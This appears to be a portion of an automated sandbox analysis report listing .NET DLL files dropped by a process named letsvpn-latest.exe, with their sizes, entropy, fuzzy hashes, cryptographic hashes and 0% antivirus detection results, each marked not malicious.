                                                                                                                                                                                                  SHA-512:42D8CD32B54AEBCB811496448632F75F2C1BB339536D106B9A809D076CFBD9BFF2DF908BC49E57329BC66099C9975EDE27BEDDE03574F26B2DC576FC0BC6A9EF
                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                  Antivirus:
                                                                                                                                                                                                  • Antivirus: ReversingLabs, Detection: 0%
                                                                                                                                                                                                  Reputation:unknown
                                                                                                                                                                                                  Process:C:\ProgramData\letsvpn-latest.exe
                                                                                                                                                                                                  File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                  Size (bytes):110112
                                                                                                                                                                                                  Entropy (8bit):6.152337090409948
                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                  SSDEEP:3072:Yc6dvOJgPj92wqhe2CfvegBPLl86bqagz/i:MKYZTeu
                                                                                                                                                                                                  MD5:A350BD4DA0FE0F225C2EE57A7ADC974C
                                                                                                                                                                                                  SHA1:11B3FCD8D9E2667170845B25CBBFCEB9A5E6ADAC
                                                                                                                                                                                                  SHA-256:D498B2869289EC7D1D5F803B1ED303254F84F9CD0BFCEE98CCA4C903CCB46D42
                                                                                                                                                                                                  SHA-512:6055BF4F094DCFD0554EF4DF25BA774B0FC1A72C7CF045718E25A28C9D3EA10D198AA8FB478E332BB73A96E1245841B4F3A35A49C2FDA555ABB11F607EBA84A1
                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                  Antivirus:
                                                                                                                                                                                                  • Antivirus: ReversingLabs, Detection: 0%
                                                                                                                                                                                                  Reputation:unknown
                                                                                                                                                                                                  Process:C:\ProgramData\letsvpn-latest.exe
                                                                                                                                                                                                  File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                  Size (bytes):465952
                                                                                                                                                                                                  Entropy (8bit):6.223512663085733
                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                  SSDEEP:6144:VcGv7iCPwqEYosfdBtmXaxWoXY06nQk2zLRC+oRZkR4CDy2sqIT0czXDU:x+CoCoCBtmXWnL6nd2ZiUR4WylT0qA
                                                                                                                                                                                                  MD5:944E14779C3757DCB53332A71F2E5ADD
                                                                                                                                                                                                  SHA1:F1F8AED8C6C4BD4E49E5ED2BBF5D2E44B8CB2416
                                                                                                                                                                                                  SHA-256:15C8E0EBC6B5CDFABFE66B535B21F128302243DED742FAC17CB6B4876F39BBBD
                                                                                                                                                                                                  SHA-512:7DB016F3ADE6AF48900B475D31AF9589D95773CC90363FB7366AC5FAEAE7330DE65C25DCE46707A73FE960830EE99112CA3FA7E7EF1CCB972D90FC4DDA2B9E83
                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                  Antivirus:
                                                                                                                                                                                                  • Antivirus: ReversingLabs, Detection: 0%
                                                                                                                                                                                                  Reputation:unknown
                                                                                                                                                                                                  Process:C:\ProgramData\letsvpn-latest.exe
                                                                                                                                                                                                  File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                  Size (bytes):279072
                                                                                                                                                                                                  Entropy (8bit):6.057160854647767
                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                  SSDEEP:6144:abwZzM/arIPizbgQtYYYncnWDOsksHgtBwsbe+/uSO+:ZzM/arIPizxUncQfZHe
                                                                                                                                                                                                  MD5:0C61C76A9B8AF9ADF445838644CF9E3E
                                                                                                                                                                                                  SHA1:0E53E56F6461FB51AC598B0E09646F9BFC840B16
                                                                                                                                                                                                  SHA-256:F15F93D9EFDF561F15CAC6AF006AA1A088E28D41A7499AE62551C4A4B6A2CF85
                                                                                                                                                                                                  SHA-512:75AD643B9FD579856DA7913C554FEFA72526F6B9C1172E7BDBFC58BDB1985DE9C82A5284E36040BA26AD30E606978FDAB36959D5501DC623316997576B101F12
                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                  Antivirus:
                                                                                                                                                                                                  • Antivirus: ReversingLabs, Detection: 0%
                                                                                                                                                                                                  Reputation:unknown
                                                                                                                                                                                                  Process:C:\ProgramData\letsvpn-latest.exe
                                                                                                                                                                                                  File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                  Size (bytes):53792
                                                                                                                                                                                                  Entropy (8bit):6.218859181017788
                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                  SSDEEP:1536:DDGXmBiXanx+zehk/WpB/yO0yW3qKm/mT:DDGXmBiXMhkOH/yO9WK/Y
                                                                                                                                                                                                  MD5:A348A1D502F3C891C1F42B43B9F4FE80
                                                                                                                                                                                                  SHA1:C080826E2D494DBA660B58F2AAC564325908624C
                                                                                                                                                                                                  SHA-256:C2B259C89D33CDCE77C235865C59BABD8D19C0D81AF94FA4EB450CC317656303
                                                                                                                                                                                                  SHA-512:F4584975AB126780D0EA42352F9327DB639C5F2A7DA0062811C0DBE7ADFF77C15B37C54FCF68A7B4A6FBA7DFC65423734FDC395B87509D9ED063236D098664F7
                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                  Antivirus:
                                                                                                                                                                                                  • Antivirus: ReversingLabs, Detection: 0%
                                                                                                                                                                                                  Reputation:unknown
                                                                                                                                                                                                  Process:C:\ProgramData\letsvpn-latest.exe
                                                                                                                                                                                                  File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                  Size (bytes):16928
                                                                                                                                                                                                  Entropy (8bit):6.919726757848139
                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                  SSDEEP:384:ADNxWQFWkhqWOHlLf2KQcvBZ9i29XS+ShjmM6IGBkSg:ADNVvq3b2KZBZ7NS+ST6nkr
                                                                                                                                                                                                  MD5:12B94E7812C697C6EFC47CA203ACAF43
                                                                                                                                                                                                  SHA1:297127456EEE356A6D9471FED7AD3901E5D8E9D4
                                                                                                                                                                                                  SHA-256:D6BD67AC706FFC9E6AF619A38435ACAF4E9B218A8916BC6594CE5E878E3EB148
                                                                                                                                                                                                  SHA-512:136440711FB736ABB42029F5D2C42AFF486D5DFADB50FF7C9F7ED5E3BB9A5B44D0FBCD12E1079B520557A95FBA39E2E23A0FF07A11622971045F59340C538FDB
                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                  Antivirus:
                                                                                                                                                                                                  • Antivirus: ReversingLabs, Detection: 0%
                                                                                                                                                                                                  Reputation:unknown
                                                                                                                                                                                                  Process:C:\ProgramData\letsvpn-latest.exe
                                                                                                                                                                                                  File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                  Size (bytes):23584
                                                                                                                                                                                                  Entropy (8bit):6.770204264572881
                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                  SSDEEP:384:grMdp9yXOfPfAxR5zwWvYW8ashqWOHlLf2KQcvBZ95c5S+ShjmM6IGBkS0xYm:grMcXP6Pq3b2KZBZgS+ST6nkBxYm
                                                                                                                                                                                                  MD5:D93FEE543469096A52E7A2C6C387BC11
                                                                                                                                                                                                  SHA1:AB0B4E8FB20AE717AD52BB06B77403FAD5B478AE
                                                                                                                                                                                                  SHA-256:F29862B3DFCD861EE5942607AF138F0AA389C12BD29C0C6B9A4B45F363A7118A
                                                                                                                                                                                                  SHA-512:047290C6236FD56A6F10D801DD2CD83E4EDA69FCE82F6FD814713140ECC0ED99048D31526D157DEB4304BA29BC93FA6EA245998D42D7ACCB4D5B524E3580E8BC
                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                  Antivirus:
                                                                                                                                                                                                  • Antivirus: ReversingLabs, Detection: 0%
                                                                                                                                                                                                  Reputation:unknown
                                                                                                                                                                                                  Process:C:\ProgramData\letsvpn-latest.exe
                                                                                                                                                                                                  File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                  Size (bytes):30752
                                                                                                                                                                                                  Entropy (8bit):6.38982790597927
                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                  SSDEEP:768:wgXxtu5jEIYDhzZpmaq3b2KZBZGS+ST6nkt:wgxt2YDh1pm13qK0/mT
                                                                                                                                                                                                  MD5:ADA23DADD0F2DFC00C48BA3B598F7F0E
                                                                                                                                                                                                  SHA1:EF20B60E66303AB86DCF5D2BC4EA47A425918CAF
                                                                                                                                                                                                  SHA-256:FD1DEFE276BD27F4EE1795972A00ADEED2AB08FF7DF4AAF0A10602C271B847FB
                                                                                                                                                                                                  SHA-512:9E6155AE8BD8E09060442DBDE5EA43331ED7E75D5CF85A74FA333F168F464767E589FBB8065CD74D56C8A2FD1671FB6308E1DF0C587373D32F5C0618FE4B299A
                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                  Antivirus:
                                                                                                                                                                                                  • Antivirus: ReversingLabs, Detection: 0%
                                                                                                                                                                                                  Reputation:unknown
                                                                                                                                                                                                  Process:C:\ProgramData\letsvpn-latest.exe
                                                                                                                                                                                                  File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                  Size (bytes):16928
                                                                                                                                                                                                  Entropy (8bit):7.010043403341069
                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                  SSDEEP:384:Jm2igOWnW8rWxhqWOHlLf2KQcvBZ95WaS+ShjmM6IGBkSu7Vj:5tCq3b2KZBZLS+ST6nkxVj
                                                                                                                                                                                                  MD5:9DF1738B2AADE4A06E42F8C82D9A5805
                                                                                                                                                                                                  SHA1:D1BE1D4029E07F0DC39D36F4ECDC7A866AE84FDE
                                                                                                                                                                                                  SHA-256:F7CA06EE9ED296CE61E20ADC9589F5AC2008F382339F3F6D5E763F04E9104027
                                                                                                                                                                                                  SHA-512:F4EA572C90FFDDC7A5F9F76887642BB0473982493253AE9DEB5900BC4870179EF4398FE8BE9C7DD6919B939FAF66C3AB1031B08A75E2DEE2FBFF48BA8CB6EFAD
                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                  Antivirus:
                                                                                                                                                                                                  • Antivirus: ReversingLabs, Detection: 0%
                                                                                                                                                                                                  Reputation:unknown
                                                                                                                                                                                                  Process:C:\ProgramData\letsvpn-latest.exe
                                                                                                                                                                                                  File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                  Size (bytes):16928
                                                                                                                                                                                                  Entropy (8bit):6.999966721912843
                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                  SSDEEP:384:enapn1iwwPWcGWHhqWOHlLf2KQcvBZ9ncIS+ShjmM6IGBkS3+:dDupq3b2KZBZuIS+ST6nkA+
                                                                                                                                                                                                  MD5:C724C97C789F51428C7CB5005DFD7FC1
                                                                                                                                                                                                  SHA1:69BF55DDB676112F3F5ABEF38AB997BA4ABE1458
                                                                                                                                                                                                  SHA-256:C3D214484B63E040DE737A4B065A87E3B2DB6072DFA7EDE28F4DDE633C5C09A9
                                                                                                                                                                                                  SHA-512:6765D6F3E4A81B522512C35D9B5DFE9B96552D90E6D7C871E0A0F46E5A309C568CB815B3E92649BB0723233CA629B0A8DA00F0D43BC4007FF51EE30F2C496A47
                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                  Antivirus:
                                                                                                                                                                                                  • Antivirus: ReversingLabs, Detection: 0%
                                                                                                                                                                                                  Reputation:unknown
                                                                                                                                                                                                  Process:C:\ProgramData\letsvpn-latest.exe
                                                                                                                                                                                                  File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                  Size (bytes):16928
                                                                                                                                                                                                  Entropy (8bit):7.005775503871292
                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                  SSDEEP:384:PHLaEav5aaUa6arWVLWKhqWOHlLf2KQcvBZ9V0S+ShjmM6IGBkSE:+Pv5t/NOTq3b2KZBZcS+ST6nkT
                                                                                                                                                                                                  MD5:DA4200A72DBFE725B71564C24FE16C08
                                                                                                                                                                                                  SHA1:C3CEBDBC20FDB2F941E88809F501255C6312362F
                                                                                                                                                                                                  SHA-256:36573488F5BA2D791A14775E9781DF5FB628F4262887757297874720C281E9B8
                                                                                                                                                                                                  SHA-512:026B7C70AC66FC3A53F48317A6C03EF5A2BE5CB1ECD95A5FF931137AB9E823687FFFDBB29D1E56B852093D6DD081AF29CEAE352C86AFC5B1E0F5D47F728AF3ED
                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                  Antivirus:
                                                                                                                                                                                                  • Antivirus: ReversingLabs, Detection: 0%
                                                                                                                                                                                                  Reputation:unknown
                                                                                                                                                                                                  Process:C:\ProgramData\letsvpn-latest.exe
                                                                                                                                                                                                  File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                  Size (bytes):17440
                                                                                                                                                                                                  Entropy (8bit):6.874636894850293
                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                  SSDEEP:384:W6iIJq56dOuWSKeWLhqWOHlLf2KQcvBZ94tUEiS+ShjmM6IGBkS+RJ:AiAdq3b2KZBZCeFS+ST6nkhJ
                                                                                                                                                                                                  MD5:6F94A6ECF59BB9B2F4F7CA404C0E9AA2
                                                                                                                                                                                                  SHA1:39C51481E7AB3B57789E8EB2E56F29F59DF1C9B9
                                                                                                                                                                                                  SHA-256:F2A09948F8B8B80E3BB165BB68936DCB55545E549D8CBE4E64651A253F67625D
                                                                                                                                                                                                  SHA-512:D64CAE00ABD57973B690D304A33568AC5231A43CF57F33353D675788D2F9268C5327569E3024AC5798A6F6F62C9B0A305A337B1A930DF94FFB76BBA8E033CE20
                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                  Antivirus:
                                                                                                                                                                                                  • Antivirus: ReversingLabs, Detection: 0%
                                                                                                                                                                                                  Reputation:unknown
                                                                                                                                                                                                  Process:C:\ProgramData\letsvpn-latest.exe
                                                                                                                                                                                                  File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                  Size (bytes):38944
                                                                                                                                                                                                  Entropy (8bit):6.044580550740905
                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                  SSDEEP:768:1XDQsPurQcR3y6JOnSHDYFD5q3b2KZBZKS+ST6nkoc/z:1zPtcE6JhHEFo3qK4/mRb
                                                                                                                                                                                                  MD5:7A2E8A66CF511AFD062CC573C2EF4D8D
                                                                                                                                                                                                  SHA1:D2D5EF3B00E83F19126BC8CD55C96D36F8E60F3C
                                                                                                                                                                                                  SHA-256:9941DF3D31B62A3C32FE3239A4F6BC88A92D688F8F95FD335601186C729F8A36
                                                                                                                                                                                                  SHA-512:45076D97149B394A41D71177F27510BBB2D223C12978EFD21964C18B4FFAACF98F21C07ACD5CCF01EDDC1B51CFB4AA017D0C16F85669D2EC62E350045C78D89E
                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                  Antivirus:
                                                                                                                                                                                                  • Antivirus: ReversingLabs, Detection: 0%
                                                                                                                                                                                                  Reputation:unknown
                                                                                                                                                                                                  Process:C:\ProgramData\letsvpn-latest.exe
                                                                                                                                                                                                  File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                  Size (bytes):17440
                                                                                                                                                                                                  Entropy (8bit):6.916556938875989
                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                  SSDEEP:384:ynzz+MpSaLWW0+WUhqWOHlLf2KQcvBZ9v6yS+ShjmM6IGBkSlX:kpu8q3b2KZBZDS+ST6nke
                                                                                                                                                                                                  MD5:B86B587463EDAA3768293EDE624B3CD7
                                                                                                                                                                                                  SHA1:EBEA0558A43695AB59EA7F452505CAA2C2F61621
                                                                                                                                                                                                  SHA-256:B1B098D825BC132321187B1C651CA3FB81F5430FCD739166A998459BB35E157A
                                                                                                                                                                                                  SHA-512:DD311019BB290F4D72C431018EE1F5DA966CBC2BADE3C640159E270746F2646E89AD625C0130152BC70AAF89BC89A24AE632821CE36B7F7647FEA8B07B099240
                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                  Antivirus:
                                                                                                                                                                                                  • Antivirus: ReversingLabs, Detection: 0%
                                                                                                                                                                                                  Reputation:unknown
                                                                                                                                                                                                  Process:C:\ProgramData\letsvpn-latest.exe
                                                                                                                                                                                                  File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                  Size (bytes):17440
                                                                                                                                                                                                  Entropy (8bit):6.968791073790615
                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                  SSDEEP:384:iGhr+YUfyHxsW/HWJhqWOHlLf2KQcvBZ9zeuBS+ShjmM6IGBkSJmU:Bkmuq3b2KZBZcuBS+ST6nk0mU
                                                                                                                                                                                                  MD5:4EA434032E4ABAE29FFB6623CC92FD24
                                                                                                                                                                                                  SHA1:9851A754766A3DC985969AA1C62C34DB7F3112CF
                                                                                                                                                                                                  SHA-256:B7BA57379B2F6F2DBA310A77A9964A058BE4B125C662F54B415BBB2507A682DF
                                                                                                                                                                                                  SHA-512:63C26140E3AD318142765318D7D5580A0A9A76B1633367D65AFE1CD9A188DE46C5C824D3256F3443A99C97563939728583783676FD8B7D2633D4C9B582DA1E3B
                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                  Antivirus:
                                                                                                                                                                                                  • Antivirus: ReversingLabs, Detection: 0%
                                                                                                                                                                                                  Reputation:unknown
                                                                                                                                                                                                  Process:C:\ProgramData\letsvpn-latest.exe
                                                                                                                                                                                                  File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                  Size (bytes):18464
                                                                                                                                                                                                  Entropy (8bit):6.90329532098987
                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                  SSDEEP:384:WRE+ruiA5vzWeNWfhqWOHlLf2KQcvBZ910IS+ShjmM6IGBkSh9:WS9bGq3b2KZBZYIS+ST6nkw9
                                                                                                                                                                                                  MD5:D4D0F693EA33F9621E425815A6F9540D
                                                                                                                                                                                                  SHA1:D680AF7B9A988EAE6073AB24FD6F48F69053848D
                                                                                                                                                                                                  SHA-256:0E85C39D139060908AAA9BC221BEC2E5E2CCD19A100CD33A472D1351536713FB
                                                                                                                                                                                                  SHA-512:8711DD683104EAAFA0CE8177C657115436DAD214B90C82F8106AC5DF73626F5CD378304956EA36D58FBF738EF907A0A62D24BE920537C70DE70C9757A25584F7
                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                  Antivirus:
                                                                                                                                                                                                  • Antivirus: ReversingLabs, Detection: 0%
                                                                                                                                                                                                  Reputation:unknown
                                                                                                                                                                                                  Process:C:\ProgramData\letsvpn-latest.exe
                                                                                                                                                                                                  File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                  Size (bytes):16928
                                                                                                                                                                                                  Entropy (8bit):6.959275806967524
                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                  SSDEEP:384:CT+6ywnVvW0LW3hqWOHlLf2KQcvBZ9cFS+ShjmM6IGBkSKM:C99Yq3b2KZBZsS+ST6nkk
                                                                                                                                                                                                  MD5:BF4BDAAF7195B5677D6D287C757B1D35
                                                                                                                                                                                                  SHA1:E4AC328BF66A86A99E123F0C661D3A8C3EF51559
                                                                                                                                                                                                  SHA-256:B5B6C8C0B67D1633BFD6503E9827AEC7350697D0B035D855D5B942A04D52CE73
                                                                                                                                                                                                  SHA-512:E5EED64C20B17443965ECB09ADEE0E9F4DBB0ED15A6F8152C8DB674E92AE8E6891F333AEB2616D5FBC4B870DD23D9ADD8C4B8E8586E67879883BFB8A89B17A4E
                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                  Antivirus:
                                                                                                                                                                                                  • Antivirus: ReversingLabs, Detection: 0%
                                                                                                                                                                                                  Reputation:unknown
                                                                                                                                                                                                  Process:C:\ProgramData\letsvpn-latest.exe
                                                                                                                                                                                                  File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                  Size (bytes):88608
                                                                                                                                                                                                  Entropy (8bit):5.4435313555375915
                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                  SSDEEP:1536:i8KGCEPg1QqF3BhejEpvS/ZFQ+2/NVQ8GLa0Uh55T3lEC/IOPbZkxqN4bENZJlfI:lHCXBheNQ+2/NVQ8GLa0Uh55T3lEC/IX
                                                                                                                                                                                                  MD5:3E10881DC5ABA9ECC4364CC059BB8578
                                                                                                                                                                                                  SHA1:403F53E6A4275E4263B62A0EF251A36D4D8497DF
                                                                                                                                                                                                  SHA-256:EBD2D8C1D24C48D1B6A41819F7818C5449EC101857A9C55969B5378C43D9A362
                                                                                                                                                                                                  SHA-512:C1B8984D572D4B84F54249E145A4BF5400DE475598DC0F9094280A39A0B037475D2F59671257B27AE4FECA7332FCEF03646D8A382637F1B50C274AE2CC4BB7F9
                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                  Antivirus:
                                                                                                                                                                                                  • Antivirus: ReversingLabs, Detection: 0%
                                                                                                                                                                                                  Reputation:unknown
                                                                                                                                                                                                  Process:C:\ProgramData\letsvpn-latest.exe
                                                                                                                                                                                                  File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                  Size (bytes):16928
                                                                                                                                                                                                  Entropy (8bit):6.948920609937838
                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                  SSDEEP:384:1RbzriaXT+WlEW/hqWOHlLf2KQcvBZ9bNS+ShjmM6IGBkSd6C:H7iczq3b2KZBZPS+ST6nko6C
                                                                                                                                                                                                  MD5:9E2EDAE28E5C799121F9D0F05B761B39
                                                                                                                                                                                                  SHA1:98E324B6408BF42BA6E64728D3368E4BD4D5CDC9
                                                                                                                                                                                                  SHA-256:50665BD9288B3F7AC75F9691154CA6CEEC8C990E1BE2B2F34E96E09C597A8C8C
                                                                                                                                                                                                  SHA-512:EA993FAAC3545CAA30A005B915F7739586EDD8CADCD321C1F20A958559974D291A737F83A01E5EA7BF8C0BA20C08D40C05250536EFD875591DE9FFAD3B3CC605
                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                  Antivirus:
                                                                                                                                                                                                  • Antivirus: ReversingLabs, Detection: 0%
                                                                                                                                                                                                  Reputation:unknown
                                                                                                                                                                                                  Process:C:\ProgramData\letsvpn-latest.exe
                                                                                                                                                                                                  File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                  Size (bytes):150048
                                                                                                                                                                                                  Entropy (8bit):5.459404128686192
                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                  SSDEEP:3072:idYO+3m9R6e1x03BZ6bDSzZ8B0uAP+NfX/Y:o+2jv1x0ebezWiuzfA
                                                                                                                                                                                                  MD5:7E966799E708109C423A35B6E3340CF2
                                                                                                                                                                                                  SHA1:0AD32A3EAF26063B19FBF4F22F3EA3D8B49A2024
                                                                                                                                                                                                  SHA-256:70D32B4555F388CF4A63A63CF4048DD16CF5AFD27FCE888A19CEC2DD98641F88
                                                                                                                                                                                                  SHA-512:C3669AEC2EE69ACE5141C93059E0CDBC8D160EF53AB6BE7D019EAFCA40CCAF8AC3772D833CBCC17AD23CA4B6579B90DA0869E97A11CF111E330B525D88B2AC5E
                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                  Antivirus:
                                                                                                                                                                                                  • Antivirus: ReversingLabs, Detection: 0%
                                                                                                                                                                                                  Reputation:unknown
                                                                                                                                                                                                  Process:C:\ProgramData\letsvpn-latest.exe
                                                                                                                                                                                                  File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                  Size (bytes):83488
                                                                                                                                                                                                  Entropy (8bit):5.98305460524727
                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                  SSDEEP:768:ZKsCikxiUPLkOWoYSAkm4fHLofFv9Rit9zzv5dnCsq3b2KZBZbS+ST6nkDL9:VfkxBIOYSq4/2biHrnCn3qKZ/mB9
                                                                                                                                                                                                  MD5:38D22AC2B692ACF76D92A78D6E7C3E70
                                                                                                                                                                                                  SHA1:73BDB1B25A805604E37DA7D97BBCDF0E18EEC6BF
                                                                                                                                                                                                  SHA-256:6A3A2B2EC8E6AD3CC8F0D13F74F4235F8B4655A369BCE8AE2EE6F2D333691FAA
                                                                                                                                                                                                  SHA-512:BA1226BE9B9BDAC47DD568C569AE2DDDCFF588070A25FF497CFA50591BF2DE00C27C04756BC56EC923AE50EFFF4D8B84A7745FBCFB583D4E92BBC0B48B710B2D
                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                  Antivirus:
                                                                                                                                                                                                  • Antivirus: ReversingLabs, Detection: 0%
                                                                                                                                                                                                  Reputation:unknown
                                                                                                                                                                                                  Process:C:\ProgramData\letsvpn-latest.exe
                                                                                                                                                                                                  File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                  Size (bytes):101408
                                                                                                                                                                                                  Entropy (8bit):5.839974107688984
                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                  SSDEEP:1536:q+kZKluk7ZFrtpAauVXrbtYC/xBu9L43qKj/mR:q+kzk7p4rbtYC/xBO4X/u
                                                                                                                                                                                                  MD5:17826E6B5B3FC50085AA80138A8718E6
                                                                                                                                                                                                  SHA1:DF573ABF9B431649FC0ED53DEBDF2E7FC3A9E270
                                                                                                                                                                                                  SHA-256:EF3D0790B048EA6A322743E69A5FDBD636B4034A2CB3CE988EA1B336E15D8EF6
                                                                                                                                                                                                  SHA-512:D5CAA4D0A5C7016B918C92FDFDFB619BD1CE98D71B7C9AB25983D1FD359460A44F4C64C94C241F18C805B1F10BAA134F57CA327ADA2D9302F8C5121D6AA6F769
                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                  Antivirus:
                                                                                                                                                                                                  • Antivirus: ReversingLabs, Detection: 0%
                                                                                                                                                                                                  Reputation:unknown
                                                                                                                                                                                                  Process:C:\ProgramData\letsvpn-latest.exe
                                                                                                                                                                                                  File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                  Size (bytes):225312
                                                                                                                                                                                                  Entropy (8bit):5.699948129437032
                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                  SSDEEP:6144:+XFpBZBJL3rBxad7/bAkGF60FhFoFmF8cjcsc4FEFbFgcbFmFiF6FhFuFBFuFDFz:OFRf60FhFoFmF8cjcsc4FEFbFgcbFmFz
                                                                                                                                                                                                  MD5:167F70DEA1E5182A5AB8A28413152050
                                                                                                                                                                                                  SHA1:E961CAE2EF1FD6B104F9699D32A0F7919D45ED5F
                                                                                                                                                                                                  SHA-256:0491ACB4AB821BF901A0BD9525B15640F6CFDC787E9F124D5A2F6D208D506C79
                                                                                                                                                                                                  SHA-512:0D70FA751AAD11A8929A373477A1F9B6B2D4792565952B95DE29D437C3CF49AE3511109F15E82C2C7B2BB65DE8C7BDEC677851C5DDAA8DAE2245A4F4B30A6ED4
                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                  Antivirus:
                                                                                                                                                                                                  • Antivirus: ReversingLabs, Detection: 0%
                                                                                                                                                                                                  Reputation:unknown
                                                                                                                                                                                                  Process:C:\ProgramData\letsvpn-latest.exe
                                                                                                                                                                                                  File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                  Size (bytes):17440
                                                                                                                                                                                                  Entropy (8bit):6.926137740956502
                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                  SSDEEP:384:ARtRWjYWVhqWOHlLf2KQcvBZ9UFsS+ShjmM6IGBkSA:aipq3b2KZBZbS+ST6nkr
                                                                                                                                                                                                  MD5:EADAE034DAA706B67962523E70B9413B
                                                                                                                                                                                                  SHA1:B066C495D1D0537E8FFBD25ADB8C4DEDF8AA2D84
                                                                                                                                                                                                  SHA-256:0C42D4083BCF4317F9758594D3707FCC9DB8E5C22671A58D533B18BF45B1ADF1
                                                                                                                                                                                                  SHA-512:A485F19ED60EE72EE6C697646C5DA34CAC7AE6EF97EF689AD5706C13E284901DC988BF77422DCC01866C8B1A771B5A4259E198E3185007CE6B7364EB608EE94C
                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                  Antivirus:
                                                                                                                                                                                                  • Antivirus: ReversingLabs, Detection: 0%
                                                                                                                                                                                                  Reputation:unknown
                                                                                                                                                                                                  Process:C:\ProgramData\letsvpn-latest.exe
